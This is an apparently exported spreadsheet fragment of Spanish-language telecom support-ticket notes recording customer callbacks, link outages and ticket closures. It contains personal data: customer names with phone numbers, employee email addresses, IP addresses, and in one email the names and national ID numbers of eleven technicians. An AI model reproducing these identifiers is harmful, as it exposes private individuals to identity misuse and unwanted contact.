    <t>**SE LLAMA A CLIENTE MARIA LUZ HIGUEROS AL 33593270 INDICA QUE SE PUEDE PROCEDER CON EL CIERRE DEL TICKET Y QUE ELLOS ESTARAN REALIZANDO PRUEBAS INTERNAS **
ID 2001945913
**</t>
  </si>
  <si>
    <t>F4564918</t>
  </si>
  <si>
    <t>SE LLAMA A  JEFE DE AGENCIA 45857470 || APOYA REINICIANDO SDA, INDICA QUE YA ENCIENDIO LED VERDE, ASI TAMBIEN SE CONSULTA SI CUENTA CON UPS, INFORMA QUE YA LO HAN SOLICITADO PERO AUN NO SE LOS HAN ENVIADO PORQUE SOLO TIENE CONECTADOS ALGUNOS EQUIPOS Y NO TIENE CAPACIDAD PARA MAS, YA QUE LA ENERGIA ES ALGO INESTABLE EN EL LUGAR, EL DIA DE HOY A ESO DE LAS 12 HORAS INDICA QUE TUVIERON OTRO CORTE DE ENERGIA,
ID
3001002674
COLA:
NOMBRE: A: 45857470
NÚMERO: 45857470
DURACIÓN: 0:03:38
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 45857470
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 17/05/2022 16:25:22</t>
  </si>
  <si>
    <t>F4564931</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA ISABEL VASQUEZ 54678087 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001886049</t>
  </si>
  <si>
    <t>F4564956</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON LOS REGISTROS DE SATURACION DEL ENLACE.
ASUNTO: REGISTROS DE SATURACIÓN SD1125990 || ID1026275 || TRANSPORTES SEBASTIAN S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4564958</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEJANDRA  MEDINA 41849137 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001717635</t>
  </si>
  <si>
    <t>F4564966</t>
  </si>
  <si>
    <t>CLIENTE VALIDA-
NOTA: CLIENTE INDICA QUE QUIERE MIGRARSE DE RADIO A FIBRA- SE LE INDICA QUE SE AVOQUE A SU EJECUTIVO ##
2001681628
COLA:
NOMBRE: A: 41517131
NÚMERO: 41517131
DURACIÓN: 0:06:08
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 41517131
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 12:46:05</t>
  </si>
  <si>
    <t>BARBARA  REYES-41517131 --- SE TIENE EN LINEA ##
2001681628
COLA:
NOMBRE: A: 41517131
NÚMERO: 41517131
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 41517131
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/05/2022 12:40:06</t>
  </si>
  <si>
    <t>F4564969</t>
  </si>
  <si>
    <t>SE HABLA CON TECNICO JAVIER  EL CUAL SE COLOCA EN LLAMADA EL CLIENTE HIBU RODRIGUEZ SE LE COMENTA QUE EL ANCHO DE BANDA CONTRATADO EN SU ENLACE DE DATOS ES DE 10M, PERO EL DEL INTERNET SE LO PROPORCIONA LA CENTRAL, Y QUE EN LA CENTRAL TIENE CONTRATADO 30M QUE ESTAN REPARTIDO A VARIOS PUNTOS, POR LO CUAL NO LE ESTA DANDO EL ANCHO DE BANDA TOTAL YA QUE HAY VARIAS SUCURCALES QUE ESTAN UTILIZANDO EL RECURSO, COMENTA QUE ESTARA HABLANDO CON EJECUTIVO PAR REALIZAR UN AUMENTO DEL ANCHO DE BANDA, POR LO QUE BRINDA CIERRE DE FALLA.
2001771219
COLA:
NOMBRE: A: 58262225
NÚMERO: 58262225
DURACIÓN: 0:43:10
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58262225
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 16/05/2022 17:54:28</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BARRERA 56300178 MENCIONA QUE PERSISTE EL INCONVENIENTE DE LENTITUD DESDE LA SEMANA PASADA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001680621</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO BARRERA  AL 56300178 SE BRINDA RETROALIMENTACION A CLIENTE **
ID 2001702596
**</t>
  </si>
  <si>
    <t>F4564994</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 17:30
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; AGUILAR MENDOZA EMILIO &lt;EAMENDOZ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCGMD0012M-P::: TICKET CNOC IMGMD005043::: "FUERA DE SERVICIO"
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE HABLÓ CON KARINA RUÍZ/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCGMD0012M-P::: TICKET CNOC IMGMD005043::: "FUERA DE SERVICIO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 DEJAN ESPERA Y NO TENOMAN LA LLAMADA, SE INTENTARA LUEGO
-ID 2001777496</t>
  </si>
  <si>
    <t>F4565015</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE EDUARDO LIMA  54343746 QUIEN COMENTA QUE POR MOMENTOS SE TUVO PROBLEMAS CON LA SEÑAL DEL E1 EL DIA DE AYER, PERO POR LA TARDE YA TODO ESTUVO NORMAL Y HOY POR LA MAÑANA CON FUNCIONAMIENTO CORRECTO. SE PROCEDE AL CIERRE DEL CASO.</t>
  </si>
  <si>
    <t>F4565017</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO PERMISOS DE ACCESO PARA PERSONAL TECNICO QUE ATENDERÁ LA FALLA.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: LUNES, 16 DE MAYO DE 2022 16:53PARA: OHERNANDEZ@CBXGLOBAL.COM &lt;OHERNANDEZ@CBXGLOBAL.COM&gt;; LLEON@CBXGLOBAL.COM &lt;LLEON@CBXGLOBAL.COM&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: 623000001T || CARIBEX WORLWIDE GUATEMALA, S.A. || SD1126017
BUENAS TARDES ESTIMADO CLIENTE,
COMO PARTE DEL SEGUIMIENTO AL REPORTE REALIZADO CON SD1126017 DE ENLACE CON ID 623000001T A NOMBRE DE CARIBEX WORLWIDE GUATEMALA, S.A. SE SOLICITA PUEDA GESTIONARSE ACCESOS PARA EL PERSONAL TÉCNICO QUE PODRÍA SER ASIGNADO A LA ATENCIÓN DE LA MISMA LISTADO EL CUAL SE ADJUNTA A DICHO CORREO DEBIDO A QUE EL PERSONAL DEBE INGRESAR HERRAMIENTAS PARA REALIZAR LA REVISIÓN Y REPARACIÓN DEL ENLACE, FAVOR INDICAR DÍA Y HORA EN EL QUE SE PUEDE PROCEDER CON LA VISITA, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
HERRAMIENTA QUE INGRESARÁ PERSONAL TECNICO:
COMPUTADORA PORTÁTIL
MEDIDOR DE FIBRA ÓPTICA
LAMPARA ÓPTICA
DESARMADORES
PINZAS
LISTADO DE PERSONAL QUE PODRÍA SER ASIGNADO A LA ATENCIÓN DE LA FALLA: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SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ODELIS HERNANDEZ 41282803 MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CUANDO YA TENGA LOS PERMISOS AUTORIZADOS
CLIENTE INFORMA QUE ES NECESARIO QUE PERSONAL TECNICO INGRESE CON CHALECO ANTIREFLECTIVO
-ID 2001770072</t>
  </si>
  <si>
    <t>F4565046</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KARINA AGUILAR 86521783 INDICA QUE YA NO SE ENCUENTRA EN OFICINA QUE SE LE LLAME MAÑANA A LAS 8:0 AM **
ID 2001768296
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARINA AGUILAR 86521783 MENCIONA QUE PERSISTE LA INESTABILIDAD, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001926620</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KARINA AGUILAR 86521783 NO RESPONDE ENVIA A BYUZON || SE INTENTARA LUEGO **
ID 2001740068
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARINA AGUILAR 86521783 MENCIONA QUE POR EL MOMENTO TODO ESTA FUNCIONANDO BIEN PERO SOLICITA LLAMADA PARA LAS 10:30
-ID 2001830617</t>
  </si>
  <si>
    <t>F4565049</t>
  </si>
  <si>
    <t>CLIENTE CARLOS HERNANDEZ 78627650 COMENTA QUE TIENE INTERFERENCIA EN LLAMADAS SALIENTES A FIJOS Y MOVILES. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4565072 || PERDIDA DE AUDIO EN LLAMADAS || MASIVO_SV ||</t>
  </si>
  <si>
    <t>F4565061</t>
  </si>
  <si>
    <t>CLIENTE HUGO GOMEZ 78060035 INDICA QUE TIENEN INCONVENIENTES EN LLAMADAS SALIENTES HACIA NÚMEROS FIJOS LOS CUALES ESTÁN PRESENTANDO INTERFERENCIA. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4565062</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA GUALIN 63173304 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 2001714970
NOMBRE DEL CLIENTE: GRUPO LUBRICANTES SOLORZANO SA DE CV
UBICACIÓN:BOULEBVAR PONIENTE LOTE 4, BODEGA 12 ASIENDA EL ANGEL (OFIBODEGAS SUFICIENTES) APOPA SAN SALVADOR
CONTACTO EN SITIO: CLAUDIA GUALIN 63173304
HORARIO DE ATENCION: 8:00 - 17:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS E INDICAR QUE VAN A LA BODEGA 12</t>
  </si>
  <si>
    <t>F4565070</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN AL 8942-7076 CLIENTE RESPONDE PERO NO ESCUCHA Y CORTA LLAMADA SE INTENTARA
 LUEGO **
ID 2001744687- 2001745544
**</t>
  </si>
  <si>
    <t>F4565071</t>
  </si>
  <si>
    <t>SE RECIBE APOYO DE COMPAÑERO DE HN. SE VALIDA ENVIA CORREO. EN ESPERA QUE CLIENTE RESPONDA PARA VALIDAR
REPORTE DE CAÍDA TOTAL CON TEG 08 - KENNEDY 192.168.61.0/24
BUENAS TARDES ESTIMADOS
UN GUSTO SALUDARLE, FAVOR SU AYUDA VALIDANDO EL SERVICIO YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y SIN INCONVENIENTES, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS Y SU PROCEDER CON EL TICKET.
SALUDOS Y ÉXITOS
NOTIFICAMOS QUE EN HORARIO DE LUNES A VIERNES DE 8 PM A 7 AM Y LOS DÍAS SÁBADOS Y DOMINGOS DE 05:30 PM A 08:00 AM LAS SOLICITUDES DEBEN REALIZARSE VÍA CORREO A CLIENTESCORPORATIVOS@CLARO.COM.GT, TAMBIÉN VÍA LLAMADA AL *847 EN LA OPCIÓN 1 OPCIÓN 1.</t>
  </si>
  <si>
    <t>F4565074</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO CTC, NOS APOYA CON REINICIARLO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>-* SE HABLA CON JOSE CORADO (CLIENTE) INFORMA QUE EL CONTACTO REGISTRADO SE ENCUENTRA EN SU HORA DE ALMUERZO, EL SE ENCUENTRA EN SITIO, SE DEJA ENCONFERENCIA CON  MONICA CASTILLO (GESTORA) PARA VALIDACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>EN EL GESTOR NO SE OBSERVA EL MODEM CONECTADO, SE PROCEDE A LOCALIZAR CON CLIENTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SIN EMBARGO NO LEVANTA, CLIENTE NOS APOYA REINICIANDO TAMBIEN LA PBX PERO EL SERVICIO SIGUE SIN FUNCIONAR.
SE LE SOLICITA AL CLIENTE QUE NOS APOYE CON VALIDAR LAS ALARMAS QUE POSEE EL CTC, SIN EMBARGO CLIENTE INDICA QUE SOLO VER PWR - VERDE ENCENDIDA Y LAS DEMAS APAGADA.
SE LE INDICA AL CLIENTE QUE SE ENVIARA PERSONAL TECNICO A VERFIICAR EL SERVICIO, CLIENTE INDICA QUE NO ES NECESARIO TRAMTIAR PERMISOS Y QUE SE APRESUREN YA QUE LES URGE EL SERVICIO, CLIENTE SE RETIRA A LAS 17:00 HRS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4565082</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE VILLEGAS AL 77474455 NO RESPONDE || SE INTENTARA LUEGO **
ID 2001747273  - 2001747663
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE VILLEGAS AL 77474455 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
ID 2001766040
**</t>
  </si>
  <si>
    <t>F4565084</t>
  </si>
  <si>
    <t>F4565096</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE INMER ROJAS 79891797 - 24869131 QUIEN INDICA QUE PRESENTA PROBLEMAS CON LAS LLAMADAS SALIENTES YA QUE SE ESTAN CORTANDO HACIA LOS NUMEROS FIJOS, SE LE INDICA AL CLIENTE QUE ESTAMOS TRABAJANDO YA QUE TAMBIEN SE TIENE PROBLEMAS CON LAS LLAMADAS HACIA NUMEROS MOVILES.
CLIENTE QUEDA ENTERADO, INDICA QUE ESTAR AL PENDIENTE DE LOS AVANCES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4565098</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSMAR / 81376502 NO CONTESTO, IVR ENVIA A BUZON, YA QUE LA AFECTACION SE OBSERVA DESDE EL NODO SE SOLICITA APOYO PARA VISITA TECNICA.</t>
  </si>
  <si>
    <t>F4565100</t>
  </si>
  <si>
    <t>SE MANDA CORREO A CLIENTE SOLICITANDO COORDINAR ACCESOS
DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;ENVIADO: LUNES, 16 DE MAYO DE 2022 16:11PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ANGELO MAURICIO VALLEJOS &lt;ANGELO.VALLEJOS@CLARO.COM.GT&gt;; RICARDO ENRIQUE ARGUETA GIRON &lt;RICARDO.ARGUETAG@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;CC: CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; PEDRO DE LEON &lt;PEDRO.DELEON@SOMOSCMI.COM&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; ANGELO MAURICIO VALLEJOS &lt;ANGELO.VALLEJOS@CLARO.COM.GT&gt;ASUNTO: RE: CAÍDA ENLACE SURESA 50 CALLE, POLLO CAMPERO ID 671900007
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL EVENTO REPORTADO, SOLICITAMOS SU APOYO COORDINANDO EL ACCESO AL SITIO PARA EL SIGUIENTE PERSONAL:
PEDRO EDUARDO TOT MARTINEZ                           DPI:1681 34810 0101
JUAN JOSE RODRIGUEZ PAZ                                      DPI:2494 43260 0208
JOSE ALBERTO IXPATA TOJ                                         DPI:1660 02313 1503
MARLON ENRIQUE MUÑOZ ORELLANA                 DPI:1582 46500 1801
MILTON ENRIQUE SALAZAR PEREZ                         DPI:2626 48784 0101
LUIS EMILIO GONZALEZ CATALAN                           DPI:2530 48877 0101
EDWIN EDUARDO DEL CID DUBON                         DPI:1981 48798 0101
JAVIER DANILO, CHETE CHAJON                              DPI:2149 40594 0103
DANIEL ENRIQUE MONTENEGRO CARACUN         DPI:2414 54425 0101
EDGAR DANIEL GOMEZ MENDEZ                            DPI:1628 97243 1401
JUAN ALBERTO TRUJILLO ORTIZ                               DPI:2487 19076 0115
SU APOYO CONFIRMANDO FECHA Y HORA QUE SE PUEDE REALIZAR VISITA, QUEDAMOS ATENTOS A LOS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE ESCALÓ CON MARLON MÚÑOZ/METRO 58263218 INDICA QUE NO ES CORTE DE CABLE, SI NO CORTE DE FO EN SECTOR; SE ESCALÓ CON RUDY SIPAQUE/SUPERVISOR FO METRO 58261782 INDICA QUE LA MUNICIPALIDAD GUATEMALA ESTABA REALIZANDO TRABAJANDO EN ALGUNAS BANQUETAS DEL SECTOR Y POLIDUCTO ESTABA A LA VISTA EN SUPERFICIE Y PASARON CORTANDO LA MISMA; LA CONTRATA LGB YA EN SITIO TRABAJANDO, AVANCES EN UNA HORA Y MEDIA (1.30 HORAS)</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN ELIAS 47701358 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001737420</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 54824547 - JOSE LUIS ESTRADA SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001741029</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN ELIAS 47701358 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001740002</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN CABALLEROS - 43588886 SUENA DESCONECTADO, SE INTENTARA LUEGO
-ID 2001739436</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ANA POZUELOS/EJECUTIVA CLARO, SE LE INFORMA ENLACE OK, CLIENTE HARÁ SUS PRUEBAS INTERNAS, SE LE LLAMARÁ LUEGO PARA VALIDAR CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON RICARDO ARGUETA/CLIENTE 55109103 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN ELIAS 47701358 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001908115</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN ELIAS 47701358 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001898246</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ACT A CL || PERSONAL DE CABLES EN CAMINO, AVANCES EN 1 HORA.
DE: JAIME JOSUE HERNANDEZ CASTILLO
ENVIADO: LUNES, 16 DE MAYO DE 2022 18:49
PARA: RICARDO ENRIQUE ARGUETA GIRON; DIEGO PABLO AJIN HERNANDEZ
CC: CARLOS RENE PORTILLO SEN; PEDRO DE LEON; BELTER FRANCISCO AGUIRRE TELLEZ; NELSON GERARDO YUTAN CHARUC; NELSON ALBERTO MORATAYA MORALES; KEVIN ESTUARDO ELIAS; ANA CECILIA POZUELOS PACHECO; ANGELO MAURICIO VALLEJOS; TECNICORPO; GRUPO N1; CNOCCA; FONSECA BUSTAMANTE, KEVYN ANTONIO; ANGEL ARMANDO CLAVEL TOLEDO; JOSE RODOLFO ESTRADA MUÑOZ
ASUNTO: RE: CAÍDA ENLACE SURESA 50 CALLE, POLLO CAMPERO ID 671900007
ESTIMADO CLIENTE
    BUENAS NOCHES, NUESTRO PERSONAL REALIZO MEDICIONES REFLECTO MÉTRICAS SOBRE LA FIBRA, ENCONTRANDO UN EVENTOS EN LA FIBRA A 875 METROS EN DIRECCIÓN A NUESTRO NODO DE ACCESO, SE ESCALO CASO CON PERSONAL DE CABLES, AVANCES DE TRABAJOS EN 1 HORA.
AGRADECEMOS SU ATENCIÓN.
SALUDOS
ENVIADO DESDE CORREO PARA WINDOWS</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A CLIENTE VÍA CORREO, SE LE INFORMA ENLACE AFECTADO POR CORTE DE FO; OCASIONADO POR TRABAJOS DE MANTO. MUNI CAPITALINA.
ASUNTO: RE: CAÍDA ENLACE SURESA 50 CALLE, POLLO CAMPERO ID 671900007</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL INDICANDO AVANCES --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 17 DE MAYO DE 2022 01:55
PARA: RICARDO ENRIQUE ARGUETA GIRON &lt;RICARDO.ARGUETAG@SOMOSCMI.COM&gt;
CC: CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; PEDRO DE LEON &lt;PEDRO.DELEON@SOMOSCMI.COM&gt;; BELTER FRANCISCO AGUIRRE TELLEZ &lt;BELTER.AGUIRRE@SOMOSCMI.COM&gt;; NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NELSON ALBERTO MORATAYA MORALES &lt;NELSON.MORATAYA@SOMOSCMI.COM&gt;; KEVIN ESTUARDO ELIAS &lt;KEVIN.ELIAS@SOMOSCMI.COM&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ANGELO MAURICIO VALLEJOS &lt;ANGELO.VALLEJOS@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: RE: CAÍDA ENLACE SURESA 50 CALLE, POLLO CAMPERO ID 671900007
BUENOS DÍAS ESTIMADO SR. ARGUETA.
                PERSONAL A CARGO NOS COMENTA QUE ES NECESARIO CONTINUAR TRABAJOS EN EL PUNTO REMOTO SIN EMBARGO EL CONTACTO EN SITIO YA SE RETIRÓ.
SE CONTINUARAN TRABAJOS MAÑANA A PARTIR DE LAS 08:00 HRS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4565103</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN VELIZ, QUIEN VALIDA ESTADO DEL SERVICIO, PIDE SE EL ESPERE EN LINEA MIENTRAS REALZA PRUEBAS
2001881947
COLA:
NOMBRE: A: 55719640
NÚMERO: 55719640
DURACIÓN: 0:01:33
ESTADO: CONECTADA
DETALLES: 55719640
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 17/05/2022 10:49:09</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  KEVIN VELIZ AL 55719640 INDICA QUE PERSISTE EL INCONVENIENTE QUE AUN ESTA CAIDO || SE NOTIFICA A GESTOR **
ID 2001949160
**</t>
  </si>
  <si>
    <t>F4565104</t>
  </si>
  <si>
    <t>SE LLAMÓ A EJECUTIVO 58260401 PARA INFORMAR LO DICHO EN CRONO ANTERIOR, NO CONTESTA; SE LE ENVÍA CORREO PARA CONTINUAR SEGUIMIENTO DEL TICKET.</t>
  </si>
  <si>
    <t>CRONO ANTERIOR INDICA SEGUIMIENTO CON CLIENTE MAÑANA A LAS 07:30AM PARA HACER PRUEBAS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUSTAVO GARCIA 54025051 NO RESPONDE, ENVA A BUZON
-ID 3001066950</t>
  </si>
  <si>
    <t>SE LLAMÓ A GESTIÓN PARA SEGUIMIENTO, ME COMUNICAN CON GESTOR ASIGNADO, CORTAN LA LLAMADA; NO SE TUVO APOYO DE GESTIÓN N1; SE ESCALA CON KEVYN FONSECA/TEAM LEADER, INDICA QUE APOYARÁ, SE LE ENVÍA TICKET POR SKYPE.</t>
  </si>
  <si>
    <t>F4565107</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE BAYRON SALGADO, QUIEN INIDICA HABER REALIZADO PRUEBAS DE PRIMER NIVEL, PERO SERVICIO AUN SE MANTIENE CAIDO, SE LE SOLICITA INFORMACION ADICIONAL PARA  PODER VALIDAR EL ID CORRECTO DEL SERVICIO PERO INDICA QUE SE LE LLAME DESPUES YA QUE AHORITA TIENE OTRA LLAMADA.  SE LLAMARA LUEGO.
NÚMERO: 0050432675009
FIN: HOY, 12:19
ID DE LLAMADA: 2001919086</t>
  </si>
  <si>
    <t>F4565110</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR  DIEGO MORA CONFIRMA SERVICIO ESTABLE Y OPERATIVO AUTORIZA CIRRE DE TICKET **
ID 2001751384
**</t>
  </si>
  <si>
    <t>F4565122</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5122
ID:  IP2144021SV
IDENTIFICADOR DEL CLIENTE: CC_BANCO_AGRICOLA_SV_ATM_DF_CIUDAD_BARRIOS
UBICADO EN:   CIUDAD BARRIOSBO. EL CENTROCALLE 21 DE ABRILS/NDESPENSA CIUDAD BARRIOS
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A TELEFONO UBICADO EN TICKETS ANTERIORES, CONTESTA OPERADORA DE MESA DE AYUDA DE BANCO AGRICOLA INDICA QUE HORARIO DE ATENTCION ES DE LUNES A VIERNES DE 7 AM A 7 PM Y SABADOS DE 7 AM A 1 PM, SE BRINDARA SEGUIMIENTO CON CLIENTE DIA LUNES EN HORARIO HABIL.</t>
  </si>
  <si>
    <t>F4565123</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDEN PERO DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA, SE INTENTARA LUEGO
-ID 2001744771</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 16 DE MAYO DE 2022 14:49
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; AGUILAR MENDOZA EMILIO &lt;EAMENDOZ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 65400008T::: TICKET CNOC IMDHE020281::: "FUERA DE SERVICIO"
BUENOS DÍAS, ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN 187.128.59.118 DE PUNTO REMOTO.
¿SERVICIO A NIVEL WAN SE OBSERVAN OPERATIVO Y ESTABLE
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4565129</t>
  </si>
  <si>
